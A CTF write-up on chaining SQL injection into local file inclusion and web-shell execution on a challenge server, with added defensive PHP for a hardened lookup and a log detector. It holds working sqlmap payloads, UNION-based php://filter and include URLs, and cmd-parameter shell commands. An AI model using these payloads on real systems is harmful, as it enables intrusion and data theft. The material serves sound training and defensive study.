
HackIT CTF web100 V1rus3pidem1c Write up

2017. 8. 30. 15:21

ch4n3 [at] BoB 6th, team Demon & H3X0R

Very fun CTF!

I want to solve more.. hh


This challenge can be solved with SQLi + LFI.

I love this kind of challenges.

http://tasks.ctf.com.ua:13372/index.php?country=Germany

This index.php has a SQL injection vuln, so you can extract the DB.

I was very tired, so I used sqlmap.



ch4n3@Ubuntu:~$ sqlmap -u "tasks.ctf.com.ua:13372/index.php?country=UK" --threads=8 --dbs -D WHATAREYOUDOINGHERE --dump
         _
 ___ ___| |_____ ___ ___  {1.0.4.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:15:26

[15:15:26] [INFO] resuming back-end DBMS 'mysql'
[15:15:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: country (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: country=UK' AND 6029=6029 AND 'gNZg'='gNZg

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: country=UK' AND (SELECT * FROM (SELECT(SLEEP(5)))Yika) AND 'thyo'='thyo
---
[15:15:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[15:15:27] [INFO] fetching database names
[15:15:27] [INFO] fetching number of databases
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 18
[15:15:27] [INFO] resumed: information_schema
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 19
[15:15:27] [INFO] resumed: WHATAREYOUDOINGHERE
available databases [2]:
[*] information_schema
[*] WHATAREYOUDOINGHERE

[15:15:27] [INFO] fetching tables for database: 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] fetching number of tables for database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] resumed: countries
[15:15:27] [INFO] fetching columns for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] resumed: countryID
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 11
[15:15:27] [INFO] resumed: countryName
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] resumed: scriptPath
[15:15:27] [INFO] fetching entries for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] fetching number of entries for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 7
[15:15:27] [INFO] resumed: Germany
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ge.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 12
[15:15:27] [INFO] resumed: Turkmenistan
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/tu.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 11
[15:15:27] [INFO] resumed: Netherlands
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ne.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 4
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Serbia
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/se.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 5
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Turkey
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/tk.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: France
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/fr.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 7
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] resumed: UK
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/uk.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 8
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Russia
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ru.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] resumed: USA
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/us.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Canada
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ca.php
[15:15:27] [INFO] analyzing table dump for possible password hashes
Database: WHATAREYOUDOINGHERE
Table: countries
[10 entries]
+-----------+----------------+--------------+
| countryID | scriptPath     | countryName  |
+-----------+----------------+--------------+
| 1         | country/ge.php | Germany      |
| 2         | country/tu.php | Turkmenistan |
| 3         | country/ne.php | Netherlands  |
| 4         | country/se.php | Serbia       |
| 5         | country/tk.php | Turkey       |
| 6         | country/fr.php | France       |
| 7         | country/uk.php | UK           |
| 8         | country/ru.php | Russia       |
| 9         | country/us.php | USA          |
| 10        | country/ca.php | Canada       |
+-----------+----------------+--------------+

[15:15:27] [INFO] table 'WHATAREYOUDOINGHERE.countries' dumped to CSV file '/home/ch4n3/.sqlmap/output/tasks.ctf.com.ua/dump/WHATAREYOUDOINGHERE/countries.csv'
[15:15:27] [INFO] fetched data logged to text files under '/home/ch4n3/.sqlmap/output/tasks.ctf.com.ua'
ch4n3@Ubuntu:~$

Seeing scriptPath, you can tell the "include" function is being used.

Then, if we attack the SQL, we can change the scriptPath with 'union'.

So it'll have an LFI vuln.



http://tasks.ctf.com.ua:13372/index.php?country=%27+union+select+%27php://filter/convert.base64-encode/resource=country/ge.php%27%23


9reat. We got its source code.
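The write-up does not reproduce the challenge source, so the following is an added example, not the challenge's own index.php: an assumed reconstruction of the vulnerable lookup (string-concatenated query, scriptPath passed straight to include) next to a hardened version that uses a prepared statement and only includes real .php files under country/, which refuses both php://filter wrappers and uploaded files. The PDO connection string and the hypothetical function names are assumptions.

```php
<?php
// Added example (assumed reconstruction, not the challenge's real code).
// Vulnerable pattern: country name concatenated into SQL, scriptPath included as-is.
function vulnerableLookup(PDO $db, string $country): string {
    $sql = "SELECT scriptPath FROM countries WHERE countryName = '$country'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    // A UNION SELECT in $country makes this return an attacker-chosen string,
    // and include() will happily open php://filter or uploads/php_shell.txt.
    return $row['scriptPath'];
}

// Hardened version: parameterised query, then the returned path is checked
// against the country/ directory before it ever reaches include().
function safeLookup(PDO $db, string $country): ?string {
    $stmt = $db->prepare('SELECT scriptPath FROM countries WHERE countryName = ?');
    $stmt->execute([$country]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    return isAllowedScript($row['scriptPath']) ? $row['scriptPath'] : null;
}

function isAllowedScript(string $path): bool {
    $base = realpath(__DIR__ . '/country');
    // realpath() returns false for stream wrappers (php://filter/...) and for
    // files that do not exist, and it resolves ../ so traversal is caught too.
    $real = realpath(__DIR__ . '/' . $path);
    if ($base === false || $real === false) {
        return false;
    }
    // Must be physically inside country/ and must be a .php file, so an
    // uploaded .txt under uploads/ is rejected even if the DB row is tampered.
    return strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0
        && substr($real, -4) === '.php';
}

// Assumed DSN and credentials; replace with the real ones.
$db = new PDO('mysql:host=localhost;dbname=WHATAREYOUDOINGHERE', 'DB_USER', 'DB_PASS');
$script = safeLookup($db, $_GET['country'] ?? '');
if ($script === null) {
    http_response_code(404);
    exit('unknown country');
}
include __DIR__ . '/' . $script;
```

The allowlist check is defence in depth: even if the query is fixed, a future bug that lets someone edit the countries table must not turn into file inclusion.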



You can get the path of your uploaded file. 

We can execute our web shell.



I uploaded my webshell. 

And I checked that the file exists.


http://tasks.ctf.com.ua:13372/uploads/php_shell.txt



Include it.

You can execute your web shell.


http://tasks.ctf.com.ua:13372/index.php?country=%27+union+select+%27uploads/php_shell.txt%27%23&cmd=id




view-source:http://tasks.ctf.com.ua:13372/index.php?country=%27+union+select+%27uploads/php_shell.txt%27%23&cmd=cat+iulersiueruigfuihseruhgi.php

Get flag.

The flag is h4ck1t{$QL&LFI=FR13ND$}
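From the defender's side, the three requests used above (a UNION SELECT in the country parameter, a php://filter wrapper, and an include of uploads/ with a cmd parameter) are easy to spot in the access log. The script below is an added example, not part of the write-up; the log lines are constructed for it and the function name is hypothetical.

```php
<?php
// Added example: flag access-log requests carrying the SQLi/LFI markers
// seen in this challenge. Log lines are constructed for the example.
const SAMPLE_LOG = [
    '1.2.3.4 - - [30/Aug/2017:15:15:26 +0300] "GET /index.php?country=Germany HTTP/1.1" 200 512',
    '1.2.3.4 - - [30/Aug/2017:15:16:02 +0300] "GET /index.php?country=%27+union+select+%27php://filter/convert.base64-encode/resource=country/ge.php%27%23 HTTP/1.1" 200 2048',
    '1.2.3.4 - - [30/Aug/2017:15:18:40 +0300] "GET /index.php?country=%27+union+select+%27uploads/php_shell.txt%27%23&cmd=id HTTP/1.1" 200 128',
];

// Returns a list of reasons a log line looks like the SQLi -> LFI chain; empty if clean.
function suspiciousReasons(string $logLine): array {
    if (!preg_match('/"(?:GET|POST) (\S+)/', $logLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY) ?? '';
    parse_str($query, $params);   // parse_str also URL-decodes '+' and %xx
    $reasons = [];
    foreach ($params as $name => $value) {
        $v = strtolower((string) $value);
        if (preg_match('/\bunion\s+(all\s+)?select\b/', $v)) {
            $reasons[] = "$name: UNION SELECT";
        }
        if (strpos($v, 'php://') !== false) {
            $reasons[] = "$name: php:// stream wrapper";
        }
        if (preg_match('#(^|[\'"/])uploads/#', $v)) {
            $reasons[] = "$name: include of uploads/";
        }
    }
    if (isset($params['cmd'])) {
        $reasons[] = 'cmd parameter present (web shell indicator)';
    }
    return $reasons;
}

foreach (SAMPLE_LOG as $line) {
    $reasons = suspiciousReasons($line);
    if ($reasons) {
        echo "ALERT: " . implode('; ', $reasons) . "\n  " . $line . "\n";
    }
}
```

Only the second and third sample lines produce alerts; the plain country=Germany request passes.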

